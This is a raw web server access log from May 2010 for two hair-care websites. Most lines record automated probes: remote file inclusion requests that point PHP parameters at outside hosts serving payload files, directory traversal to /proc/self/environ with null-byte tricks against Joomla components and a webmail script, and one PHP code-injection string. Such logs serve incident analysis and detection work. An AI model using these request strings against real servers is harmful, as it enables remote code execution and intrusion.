198.161.91.4 - - [24/May/2010:18:36:09 -0700] "GET /logs/access_100503.log//Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
198.161.91.4 - - [24/May/2010:18:36:13 -0700] "GET /Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:18:36:13 -0700] "GET /logs//Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:18:36:13 -0700] "GET /logs/access.log%20%20//Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:18:36:16 -0700] "GET /Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:18:36:16 -0700] "GET /logs/access.log%20%20//Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
198.161.91.4 - - [24/May/2010:18:36:16 -0700] "GET /logs//Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.114.238 - - [24/May/2010:18:36:32 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
72.5.54.51 - - [24/May/2010:18:36:43 -0700] "GET /Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
74.55.128.226 - - [24/May/2010:18:37:22 -0700] "GET /Madirish_Webmail/index.php?basedir=http://www.midlothiancamera.org/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
74.55.128.226 - - [24/May/2010:18:37:22 -0700] "GET /Madirish_Webmail/index.php?basedir=http://www.midlothiancamera.org/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
195.5.18.12 - - [24/May/2010:18:37:31 -0700] "GET /Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.63" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:18:37:37 -0700] "GET /logs/access_100419.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:18:38:02 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13050 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
109.72.86.6 - - [24/May/2010:18:39:19 -0700] "GET /logs/access.log/index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
109.72.86.6 - - [24/May/2010:18:39:19 -0700] "GET /index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
109.72.86.6 - - [24/May/2010:18:39:19 -0700] "GET /logs/index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
77.79.246.241 - - [24/May/2010:18:39:58 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
77.79.246.241 - - [24/May/2010:18:39:58 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
77.79.246.241 - - [24/May/2010:18:39:59 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
89.146.194.66 - - [24/May/2010:18:40:26 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
89.146.194.66 - - [24/May/2010:18:40:27 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
89.146.194.66 - - [24/May/2010:18:40:27 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
109.72.86.6 - - [24/May/2010:18:40:32 -0700] "GET /logs/access.log/index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
109.72.86.6 - - [24/May/2010:18:40:33 -0700] "GET /index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
109.72.86.6 - - [24/May/2010:18:40:33 -0700] "GET /logs/index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
87.106.37.197 - - [24/May/2010:18:40:39 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "www.freehairsecrets.com"
87.106.37.197 - - [24/May/2010:18:40:40 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "www.freehairsecrets.com"
87.106.37.197 - - [24/May/2010:18:40:40 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "www.freehairsecrets.com"
72.5.54.51 - - [24/May/2010:18:41:01 -0700] "GET /logs/access.log//Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
72.5.54.51 - - [24/May/2010:18:41:01 -0700] "GET /Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
72.5.54.51 - - [24/May/2010:18:41:01 -0700] "GET /logs//Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
74.55.128.226 - - [24/May/2010:18:41:17 -0700] "GET /logs/access.log//Madirish_Webmail/index.php?basedir=http://www.midlothiancamera.org/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
74.55.128.226 - - [24/May/2010:18:41:17 -0700] "GET /Madirish_Webmail/index.php?basedir=http://www.midlothiancamera.org/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
74.55.128.226 - - [24/May/2010:18:41:18 -0700] "GET /logs/access.log//Madirish_Webmail/index.php?basedir=http://www.midlothiancamera.org/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
74.55.128.226 - - [24/May/2010:18:41:18 -0700] "GET /logs//Madirish_Webmail/index.php?basedir=http://www.midlothiancamera.org/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
74.55.128.226 - - [24/May/2010:18:41:18 -0700] "GET /Madirish_Webmail/index.php?basedir=http://www.midlothiancamera.org/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
74.55.128.226 - - [24/May/2010:18:41:18 -0700] "GET /logs//Madirish_Webmail/index.php?basedir=http://www.midlothiancamera.org/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
87.117.220.133 - - [24/May/2010:18:42:29 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
72.5.54.51 - - [24/May/2010:18:42:41 -0700] "GET /logs/access.log//Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
72.5.54.51 - - [24/May/2010:18:42:41 -0700] "GET /Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
72.5.54.51 - - [24/May/2010:18:42:41 -0700] "GET /logs//Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
213.189.224.16 - - [24/May/2010:18:42:44 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.thatvilla.com/occupants/New%20Folder/2?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
213.189.224.16 - - [24/May/2010:18:42:44 -0700] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.thatvilla.com/occupants/New%20Folder/2?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
195.5.18.12 - - [24/May/2010:18:42:51 -0700] "GET /logs/access.log//Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.63" "www.freehairsecrets.com"
195.5.18.12 - - [24/May/2010:18:42:51 -0700] "GET /Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.63" "www.freehairsecrets.com"
195.5.18.12 - - [24/May/2010:18:42:51 -0700] "GET /logs//Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.63" "www.freehairsecrets.com"
72.5.54.51 - - [24/May/2010:18:42:54 -0700] "GET /logs/access_100503.log//Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
87.117.220.133 - - [24/May/2010:18:46:21 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
77.79.246.241 - - [24/May/2010:18:46:48 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
77.79.246.241 - - [24/May/2010:18:46:48 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
77.79.246.241 - - [24/May/2010:18:46:49 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:18:47:56 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13444 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:18:50:20 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14922 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
174.133.204.130 - - [24/May/2010:18:51:35 -0700] "GET /logs/index2.php?p=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.133.204.130 - - [24/May/2010:18:51:35 -0700] "GET /logs/access.log%20%20/index2.php?p=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.133.204.130 - - [24/May/2010:18:51:35 -0700] "GET /index2.php?p=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.5.18.12 - - [24/May/2010:18:52:34 -0700] "GET /logs/access.log//Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.63" "www.freehairsecrets.com"
195.5.18.12 - - [24/May/2010:18:52:34 -0700] "GET /Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.63" "www.freehairsecrets.com"
195.5.18.12 - - [24/May/2010:18:52:34 -0700] "GET /logs//Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.63" "www.freehairsecrets.com"
195.5.18.12 - - [24/May/2010:18:53:31 -0700] "GET /logs/access_100503.log//Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.63" "growlonghairfast.com"
195.5.18.12 - - [24/May/2010:18:53:31 -0700] "GET /Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.63" "growlonghairfast.com"
195.5.18.12 - - [24/May/2010:18:53:31 -0700] "GET /logs//Madirish_Webmail/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.63" "growlonghairfast.com"
87.117.220.133 - - [24/May/2010:18:54:07 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
87.117.220.133 - - [24/May/2010:18:54:07 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
87.117.220.133 - - [24/May/2010:18:54:07 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
87.117.220.133 - - [24/May/2010:18:54:30 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
87.117.220.133 - - [24/May/2010:18:54:30 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
87.117.220.133 - - [24/May/2010:18:54:31 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:18:57:32 -0700] "GET /freehairsecretsphp/viewtopic.php?p=7443 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
87.117.220.133 - - [24/May/2010:18:58:01 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
87.117.220.133 - - [24/May/2010:18:58:01 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
87.117.220.133 - - [24/May/2010:18:58:01 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
174.133.204.130 - - [24/May/2010:18:59:02 -0700] "GET /logs/access.log/index2.php?p=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:19:01:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13152 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
121.88.4.141 - - [24/May/2010:19:16:43 -0700] "GET /logs//admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:19:16:43 -0700] "GET /logs/access_100315.log%20%20//admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:19:16:43 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
112.216.153.186 - - [24/May/2010:19:17:07 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.216.153.186 - - [24/May/2010:19:17:07 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.216.153.186 - - [24/May/2010:19:17:07 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.216.153.186 - - [24/May/2010:19:17:07 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.216.153.186 - - [24/May/2010:19:17:07 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.216.153.186 - - [24/May/2010:19:17:08 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [24/May/2010:19:17:15 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [24/May/2010:19:17:15 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [24/May/2010:19:17:15 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [24/May/2010:19:17:15 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [24/May/2010:19:17:15 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [24/May/2010:19:17:15 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [24/May/2010:19:17:18 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:19:17:21 -0700] "GET /logs//admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:19:17:21 -0700] "GET /logs/access_100315.log%20%20//admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [24/May/2010:19:17:24 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [24/May/2010:19:17:24 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [24/May/2010:19:17:24 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [24/May/2010:19:17:25 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [24/May/2010:19:17:27 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [24/May/2010:19:17:27 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [24/May/2010:19:17:27 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [24/May/2010:19:17:28 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [24/May/2010:19:17:28 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [24/May/2010:19:17:28 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.5.70.66 - - [24/May/2010:19:18:25 -0700] "GET /logs/access_091123.log HTTP/1.0" 200 1294739 "http://pink-viagra.co.cc/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:19:18:46 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5830 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
58.230.162.220 - - [24/May/2010:19:18:48 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [24/May/2010:19:18:48 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [24/May/2010:19:18:48 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [24/May/2010:19:18:57 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [24/May/2010:19:19:01 -0700] "GET /logs/access_100125.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [24/May/2010:19:19:01 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [24/May/2010:19:19:02 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [24/May/2010:19:19:05 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [24/May/2010:19:19:06 -0700] "GET /logs/access_100125.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [24/May/2010:19:19:06 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [24/May/2010:19:19:07 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
112.216.153.186 - - [24/May/2010:19:19:09 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
112.216.153.186 - - [24/May/2010:19:19:09 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
